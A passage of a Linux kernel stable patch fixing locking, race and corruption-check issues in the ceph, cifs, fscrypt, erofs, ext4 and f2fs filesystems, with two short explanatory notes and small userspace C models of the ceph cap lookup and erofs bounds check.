++static int caps_show_cb(struct inode *inode, int mds, void *p)
+ {
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct seq_file *s = p;
+-
+-	seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
+-		   cap->session->s_mds,
+-		   ceph_cap_string(cap->issued),
+-		   ceph_cap_string(cap->implemented));
++	struct ceph_cap *cap;
++
++	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap)
++		seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
++			   cap->session->s_mds,
++			   ceph_cap_string(cap->issued),
++			   ceph_cap_string(cap->implemented));
++	spin_unlock(&ci->i_ceph_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 27a245d959c0a..54e3c2ab21d22 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -1632,8 +1632,8 @@ static void cleanup_session_requests(struct ceph_mds_client *mdsc,
+  * Caller must hold session s_mutex.
+  */
+ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-			      int (*cb)(struct inode *, struct ceph_cap *,
+-					void *), void *arg)
++			      int (*cb)(struct inode *, int mds, void *),
++			      void *arg)
+ {
+ 	struct list_head *p;
+ 	struct ceph_cap *cap;
+@@ -1645,6 +1645,8 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 	spin_lock(&session->s_cap_lock);
+ 	p = session->s_caps.next;
+ 	while (p != &session->s_caps) {
++		int mds;
++
+ 		cap = list_entry(p, struct ceph_cap, session_caps);
+ 		inode = igrab(&cap->ci->netfs.inode);
+ 		if (!inode) {
+@@ -1652,6 +1654,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			continue;
+ 		}
+ 		session->s_cap_iterator = cap;
++		mds = cap->mds;
+ 		spin_unlock(&session->s_cap_lock);
+ 
+ 		if (last_inode) {
+@@ -1663,7 +1666,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			old_cap = NULL;
+ 		}
+ 
+-		ret = cb(inode, cap, arg);
++		ret = cb(inode, mds, arg);
+ 		last_inode = inode;
+ 
+ 		spin_lock(&session->s_cap_lock);
+@@ -1696,20 +1699,25 @@ out:
+ 	return ret;
+ }
+ 
+-static int remove_session_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-				  void *arg)
++static int remove_session_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	bool invalidate = false;
+-	int iputs;
++	struct ceph_cap *cap;
++	int iputs = 0;
+ 
+-	dout("removing cap %p, ci is %p, inode is %p\n",
+-	     cap, ci, &ci->netfs.inode);
+ 	spin_lock(&ci->i_ceph_lock);
+-	iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap) {
++		dout(" removing cap %p, ci is %p, inode is %p\n",
++		     cap, ci, &ci->netfs.inode);
++
++		iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	}
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+-	wake_up_all(&ci->i_cap_wq);
++	if (cap)
++		wake_up_all(&ci->i_cap_wq);
+ 	if (invalidate)
+ 		ceph_queue_invalidate(inode);
+ 	while (iputs--)
+@@ -1780,8 +1788,7 @@ enum {
+  *
+  * caller must hold s_mutex.
+  */
+-static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+-			      void *arg)
++static int wake_up_session_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	unsigned long ev = (unsigned long)arg;
+@@ -1792,12 +1799,14 @@ static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+ 		ci->i_requested_max_size = 0;
+ 		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == RENEWCAPS) {
+-		if (cap->cap_gen < atomic_read(&cap->session->s_cap_gen)) {
+-			/* mds did not re-issue stale cap */
+-			spin_lock(&ci->i_ceph_lock);
++		struct ceph_cap *cap;
++
++		spin_lock(&ci->i_ceph_lock);
++		cap = __get_cap_for_mds(ci, mds);
++		/* mds did not re-issue stale cap */
++		if (cap && cap->cap_gen < atomic_read(&cap->session->s_cap_gen))
+ 			cap->issued = cap->implemented = CEPH_CAP_PIN;
+-			spin_unlock(&ci->i_ceph_lock);
+-		}
++		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == FORCE_RO) {
+ 	}
+ 	wake_up_all(&ci->i_cap_wq);
+@@ -1959,16 +1968,22 @@ out:
+  * Yes, this is a bit sloppy.  Our only real goal here is to respond to
+  * memory pressure from the MDS, though, so it needn't be perfect.
+  */
+-static int trim_caps_cb(struct inode *inode, struct ceph_cap *cap, void *arg)
++static int trim_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	int *remaining = arg;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	int used, wanted, oissued, mine;
++	struct ceph_cap *cap;
+ 
+ 	if (*remaining <= 0)
+ 		return -1;
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		return 0;
++	}
+ 	mine = cap->issued | cap->implemented;
+ 	used = __ceph_caps_used(ci);
+ 	wanted = __ceph_caps_file_wanted(ci);
+@@ -3911,26 +3926,22 @@ out_unlock:
+ /*
+  * Encode information about a cap for a reconnect with the MDS.
+  */
+-static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-			  void *arg)
++static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	union {
+ 		struct ceph_mds_cap_reconnect v2;
+ 		struct ceph_mds_cap_reconnect_v1 v1;
+ 	} rec;
+-	struct ceph_inode_info *ci = cap->ci;
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_reconnect_state *recon_state = arg;
+ 	struct ceph_pagelist *pagelist = recon_state->pagelist;
+ 	struct dentry *dentry;
++	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err;
++	int pathlen = 0, err = 0;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+-	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+-	     inode, ceph_vinop(inode), cap, cap->cap_id,
+-	     ceph_cap_string(cap->issued));
+-
+ 	dentry = d_find_primary(inode);
+ 	if (dentry) {
+ 		/* set pathbase to parent dir when msg_version >= 2 */
+@@ -3947,6 +3958,15 @@ static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+ 	}
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		goto out_err;
++	}
++	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
++	     inode, ceph_vinop(inode), cap, cap->cap_id,
++	     ceph_cap_string(cap->issued));
++
+ 	cap->seq = 0;        /* reset cap seq */
+ 	cap->issue_seq = 0;  /* and issue_seq */
+ 	cap->mseq = 0;       /* and migrate_seq */
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 0598faa50e2e0..18b026b1ac63f 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -541,8 +541,7 @@ extern void ceph_flush_cap_releases(struct ceph_mds_client *mdsc,
+ extern void ceph_queue_cap_reclaim_work(struct ceph_mds_client *mdsc);
+ extern void ceph_reclaim_caps_nr(struct ceph_mds_client *mdsc, int nr);
+ extern int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-				     int (*cb)(struct inode *,
+-					       struct ceph_cap *, void *),
++				     int (*cb)(struct inode *, int mds, void *),
+ 				     void *arg);
+ extern void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc);
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 3599fefa91f99..478b741b11075 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1190,6 +1190,8 @@ extern void ceph_kick_flushing_caps(struct ceph_mds_client *mdsc,
+ 				    struct ceph_mds_session *session);
+ void ceph_kick_flushing_inode_caps(struct ceph_mds_session *session,
+ 				   struct ceph_inode_info *ci);
++extern struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci,
++					  int mds);
+ extern struct ceph_cap *ceph_get_cap_for_mds(struct ceph_inode_info *ci,
+ 					     int mds);
+ extern void ceph_take_cap_refs(struct ceph_inode_info *ci, int caps,
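
The ceph refactor above changes the session-cap iterator contract: callbacks now
receive a stable mds id instead of a raw cap pointer, and must re-look the cap
up under i_ceph_lock, tolerating that it may have vanished in the meantime. A
compact userspace model of that lookup-under-lock discipline (the array, types
and names are all invented):

#include <pthread.h>
#include <stdio.h>

struct cap { int mds; int issued; };

struct inode_model {
	pthread_mutex_t lock;
	struct cap caps[4];
	int nr_caps;
};

/* Caller must hold ino->lock; may return NULL if the cap vanished. */
static struct cap *get_cap_for_mds(struct inode_model *ino, int mds)
{
	for (int i = 0; i < ino->nr_caps; i++)
		if (ino->caps[i].mds == mds)
			return &ino->caps[i];
	return NULL;
}

static void show_cb(struct inode_model *ino, int mds)
{
	pthread_mutex_lock(&ino->lock);
	struct cap *cap = get_cap_for_mds(ino, mds);

	if (cap)
		printf("mds%d issued=%#x\n", cap->mds, cap->issued);
	pthread_mutex_unlock(&ino->lock);
}

int main(void)
{
	struct inode_model ino = {
		.lock = PTHREAD_MUTEX_INITIALIZER,
		.caps = { { .mds = 0, .issued = 0x5 } },
		.nr_caps = 1,
	};

	show_cb(&ino, 0);	/* prints the cap */
	show_cb(&ino, 3);	/* no cap for mds3: silently skipped */
	return 0;
}
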
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 4952a94e5272d..e41154ad96afc 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -279,8 +279,10 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+ 			c, server->conn_id);
+ 
++		spin_lock(&server->srv_lock);
+ 		if (server->hostname)
+ 			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 		if (!server->rdma)
+ 			goto skip_rdma;
+@@ -607,10 +609,13 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 				server->fastest_cmd[j],
+ 				server->slowest_cmd[j]);
+ 		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j]))
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
+ 				seq_printf(m, "  %d slow responses from %s for command %d\n",
+ 					atomic_read(&server->smb2slowcmd[j]),
+ 					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+index d44808263cfba..ce5cfd236fdb8 100644
+--- a/fs/cifs/cifs_debug.h
++++ b/fs/cifs/cifs_debug.h
+@@ -81,19 +81,19 @@ do {									\
+ 
+ #define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+ do {									\
+-	const char *sn = "";						\
+-	if (server && server->hostname)					\
+-		sn = server->hostname;					\
++	spin_lock(&server->srv_lock);					\
+ 	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+ 		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, sn, ##__VA_ARGS__);	\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
+ 	} else if ((type) & VFS) {					\
+ 		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    sn, ##__VA_ARGS__);			\
++				    server->hostname, ##__VA_ARGS__);	\
+ 	} else if ((type) & NOISY && (NOISY != 0)) {			\
+ 		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      sn, ##__VA_ARGS__);		\
++				      server->hostname, ##__VA_ARGS__);	\
+ 	}								\
++	spin_unlock(&server->srv_lock);					\
+ } while (0)
+ 
+ #define cifs_server_dbg(type, fmt, ...)					\
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 077c88c49dfdf..21b31d1640e57 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -452,8 +452,10 @@ static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const cha
+ 		if (server->hostname != target) {
+ 			hostname = extract_hostname(target);
+ 			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
+ 				kfree(server->hostname);
+ 				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
+ 			} else {
+ 				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+ 					 __func__, PTR_ERR(hostname));
+@@ -620,9 +622,7 @@ cifs_echo_request(struct work_struct *work)
+ 		goto requeue_echo;
+ 
+ 	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	if (rc)
+-		cifs_dbg(FYI, "Unable to send echo request to server: %s\n",
+-			 server->hostname);
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+ 
+ 	/* Check witness registrations */
+ 	cifs_swn_check();
+@@ -1462,6 +1462,8 @@ static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *
+ {
+ 	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+ 
++	lockdep_assert_held(&server->srv_lock);
++
+ 	if (ctx->nosharesock)
+ 		return 0;
+ 
+@@ -1863,7 +1865,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	if (tcon == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock(&server->srv_lock);
+ 	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
+ 
+ 	xid = get_xid();
+ 	tcon->ses = ses;
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 6f5fbbbebec33..158a0a5f40071 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5087,6 +5087,8 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+ 	bool purge_cache = false;
++	struct cifs_deferred_close *dclose;
++	bool is_deferred = false;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5122,6 +5124,20 @@ void cifs_oplock_break(struct work_struct *work)
+ 		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+ 
+ oplock_break_ack:
++	/*
++	 * When an oplock break is received and there are no active file
++	 * handles, only cached ones, schedule the deferred close immediately
++	 * so that a new open will not reuse the cached handle.
++	 */
++	spin_lock(&CIFS_I(inode)->deferred_lock);
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	spin_unlock(&CIFS_I(inode)->deferred_lock);
++
++	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
++			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++		cifs_close_deferred_file(cinode);
++	}
++
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index cf19e6a81ed99..31e06133acc3d 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -742,7 +742,9 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -755,7 +757,7 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	spin_unlock(&cifs_inode->open_file_lock);
+ 
+ 	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
+ 		list_del(&tmp_list->list);
+ 		kfree(tmp_list);
+ 	}
+@@ -773,7 +775,9 @@ cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+ 	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -808,7 +812,9 @@ cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+ 		if (strstr(full_path, path)) {
+ 			if (delayed_work_pending(&cfile->deferred)) {
+ 				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 					if (tmp_list == NULL)
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index c47b254f0d1e2..81be17845072a 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -159,6 +159,7 @@ cifs_chan_is_iface_active(struct cifs_ses *ses,
+ /* returns number of channels added */
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ {
++	struct TCP_Server_Info *server = ses->server;
+ 	int old_chan_count, new_chan_count;
+ 	int left;
+ 	int rc = 0;
+@@ -178,16 +179,16 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		return 0;
+ 	}
+ 
+-	if (ses->server->dialect < SMB30_PROT_ID) {
++	if (server->dialect < SMB30_PROT_ID) {
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+ 		return 0;
+ 	}
+ 
+-	if (!(ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+ 		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "server %s does not support multichannel\n", ses->server->hostname);
++		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index ab59faf8a06a7..537e8679900b8 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -175,8 +175,17 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+-	if ((!tcon->ses) || (tcon->ses->ses_status == SES_EXITING) ||
+-	    (!tcon->ses->server) || !server)
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
+ 		return -EIO;
+ 
+ 	spin_lock(&server->srv_lock);
+@@ -204,8 +213,6 @@ again:
+ 	if (rc)
+ 		return rc;
+ 
+-	ses = tcon->ses;
+-
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+ 		spin_unlock(&ses->chan_lock);
+diff --git a/fs/crypto/inline_crypt.c b/fs/crypto/inline_crypt.c
+index cea8b14007e6a..8bfb3ce864766 100644
+--- a/fs/crypto/inline_crypt.c
++++ b/fs/crypto/inline_crypt.c
+@@ -12,7 +12,7 @@
+  * provides the key and IV to use.
+  */
+ 
+-#include <linux/blk-crypto-profile.h>
++#include <linux/blk-crypto.h>
+ #include <linux/blkdev.h>
+ #include <linux/buffer_head.h>
+ #include <linux/sched/mm.h>
+@@ -77,10 +77,8 @@ static void fscrypt_log_blk_crypto_impl(struct fscrypt_mode *mode,
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < num_devs; i++) {
+-		struct request_queue *q = bdev_get_queue(devs[i]);
+-
+ 		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK) ||
+-		    __blk_crypto_cfg_supported(q->crypto_profile, cfg)) {
++		    blk_crypto_config_supported_natively(devs[i], cfg)) {
+ 			if (!xchg(&mode->logged_blk_crypto_native, 1))
+ 				pr_info("fscrypt: %s using blk-crypto (native)\n",
+ 					mode->friendly_name);
+@@ -139,8 +137,7 @@ int fscrypt_select_encryption_impl(struct fscrypt_info *ci)
+ 		return PTR_ERR(devs);
+ 
+ 	for (i = 0; i < num_devs; i++) {
+-		if (!blk_crypto_config_supported(bdev_get_queue(devs[i]),
+-						 &crypto_cfg))
++		if (!blk_crypto_config_supported(devs[i], &crypto_cfg))
+ 			goto out_free_devs;
+ 	}
+ 
+@@ -184,8 +181,7 @@ int fscrypt_prepare_inline_crypt_key(struct fscrypt_prepared_key *prep_key,
+ 		goto fail;
+ 	}
+ 	for (i = 0; i < num_devs; i++) {
+-		err = blk_crypto_start_using_key(blk_key,
+-						 bdev_get_queue(devs[i]));
++		err = blk_crypto_start_using_key(devs[i], blk_key);
+ 		if (err)
+ 			break;
+ 	}
+@@ -224,7 +220,7 @@ void fscrypt_destroy_inline_crypt_key(struct super_block *sb,
+ 	devs = fscrypt_get_devices(sb, &num_devs);
+ 	if (!IS_ERR(devs)) {
+ 		for (i = 0; i < num_devs; i++)
+-			blk_crypto_evict_key(bdev_get_queue(devs[i]), blk_key);
++			blk_crypto_evict_key(devs[i], blk_key);
+ 		kfree(devs);
+ 	}
+ 	kfree_sensitive(blk_key);
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index e51f27b6bde15..340bd56a57559 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -154,6 +154,7 @@ struct erofs_sb_info {
+ 
+ 	/* what we really care is nid, rather than ino.. */
+ 	erofs_nid_t root_nid;
++	erofs_nid_t packed_nid;
+ 	/* used for statfs, f_files - f_favail */
+ 	u64 inos;
+ 
+@@ -310,7 +311,7 @@ struct erofs_inode {
+ 
+ 	unsigned char datalayout;
+ 	unsigned char inode_isize;
+-	unsigned short xattr_isize;
++	unsigned int xattr_isize;
+ 
+ 	unsigned int xattr_shared_count;
+ 	unsigned int *xattr_shared_xattrs;
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 626a615dafc2f..bd8bf8fc2f5df 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -381,17 +381,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ #endif
+ 	sbi->islotbits = ilog2(sizeof(struct erofs_inode_compact));
+ 	sbi->root_nid = le16_to_cpu(dsb->root_nid);
+-#ifdef CONFIG_EROFS_FS_ZIP
+-	sbi->packed_inode = NULL;
+-	if (erofs_sb_has_fragments(sbi) && dsb->packed_nid) {
+-		sbi->packed_inode =
+-			erofs_iget(sb, le64_to_cpu(dsb->packed_nid));
+-		if (IS_ERR(sbi->packed_inode)) {
+-			ret = PTR_ERR(sbi->packed_inode);
+-			goto out;
+-		}
+-	}
+-#endif
++	sbi->packed_nid = le64_to_cpu(dsb->packed_nid);
+ 	sbi->inos = le64_to_cpu(dsb->inos);
+ 
+ 	sbi->build_time = le64_to_cpu(dsb->build_time);
+@@ -800,6 +790,16 @@ static int erofs_fc_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	erofs_shrinker_register(sb);
+ 	/* sb->s_umount is already locked, SB_ACTIVE and SB_BORN are not set */
++#ifdef CONFIG_EROFS_FS_ZIP
++	if (erofs_sb_has_fragments(sbi) && sbi->packed_nid) {
++		sbi->packed_inode = erofs_iget(sb, sbi->packed_nid);
++		if (IS_ERR(sbi->packed_inode)) {
++			err = PTR_ERR(sbi->packed_inode);
++			sbi->packed_inode = NULL;
++			return err;
++		}
++	}
++#endif
+ 	err = erofs_init_managed_cache(sb);
+ 	if (err)
+ 		return err;
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 39cc014dba40c..bb91cc6499725 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -211,6 +211,10 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ 		if (advise & Z_EROFS_VLE_DI_PARTIAL_REF)
+ 			m->partialref = true;
+ 		m->clusterofs = le16_to_cpu(di->di_clusterofs);
++		if (m->clusterofs >= 1 << vi->z_logical_clusterbits) {
++			DBG_BUGON(1);
++			return -EFSCORRUPTED;
++		}
+ 		m->pblk = le32_to_cpu(di->di_u.blkaddr);
+ 		break;
+ 	default:
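
The erofs hunk above adds a sanity check on an on-disk field: di_clusterofs must
be smaller than the logical cluster size, i.e. below 1 << z_logical_clusterbits,
or the image is rejected as corrupted. A one-function illustration of the bound,
with made-up values:

#include <stdio.h>

static int check_clusterofs(unsigned int clusterofs,
			    unsigned int logical_clusterbits)
{
	if (clusterofs >= 1U << logical_clusterbits)
		return -1;	/* would map to -EFSCORRUPTED */
	return 0;
}

int main(void)
{
	printf("%d\n", check_clusterofs(4095, 12));	/* ok */
	printf("%d\n", check_clusterofs(4096, 12));	/* corrupted */
	return 0;
}
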
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 36225ef56b0cd..1bb55a6d79c23 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5804,7 +5804,8 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	 * mapped - no physical clusters have been allocated, and the
+ 	 * file has no extents
+ 	 */
+-	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA) ||
++	    ext4_has_inline_data(inode))
+ 		return 0;
+ 
+ 	/* search for the extent closest to the first block in the cluster */
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index eea11ad84e680..42003b5c4cadc 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3077,6 +3077,9 @@ static int ext4_da_write_end(struct file *file,
+ 	    ext4_has_inline_data(inode))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
++	if (unlikely(copied < len) && !PageUptodate(page))
++		copied = 0;
++
+ 	start = pos & (PAGE_SIZE - 1);
+ 	end = start + copied - 1;
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 74d3f2d2271f3..b160863eca141 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -762,7 +762,12 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	if (dic->clen > PAGE_SIZE * dic->nr_cpages - COMPRESS_HEADER_SIZE) {
+ 		ret = -EFSCORRUPTED;
+-		f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
++
++		/* Avoid f2fs_commit_super in irq context */
++		if (in_task)
++			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
++		else
++			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		goto out_release;
+ 	}
+ 
+@@ -1462,6 +1467,12 @@ continue_unlock:
+ 		if (!PageDirty(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
++		if (PageWriteback(cc->rpages[i])) {
++			if (wbc->sync_mode == WB_SYNC_NONE)
++				goto continue_unlock;
++			f2fs_wait_on_page_writeback(cc->rpages[i], DATA, true, true);
++		}
++
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index f92899bfcbd5e..770a606eb3f6a 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -858,6 +858,8 @@ void f2fs_submit_merged_ipu_write(struct f2fs_sb_info *sbi,
+ 	bool found = false;
+ 	struct bio *target = bio ? *bio : NULL;
+ 
++	f2fs_bug_on(sbi, !target && !page);
++
+ 	for (temp = HOT; temp < NR_TEMP_TYPE && !found; temp++) {
+ 		struct f2fs_bio_info *io = sbi->write_io[DATA] + temp;
+ 		struct list_head *head = &io->bio_list;
+@@ -2886,7 +2888,8 @@ out:
+ 
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		f2fs_submit_merged_write(sbi, DATA);
+-		f2fs_submit_merged_ipu_write(sbi, bio, NULL);
++		if (bio && *bio)
++			f2fs_submit_merged_ipu_write(sbi, bio, NULL);
+ 		submitted = NULL;
+ 	}
+ 
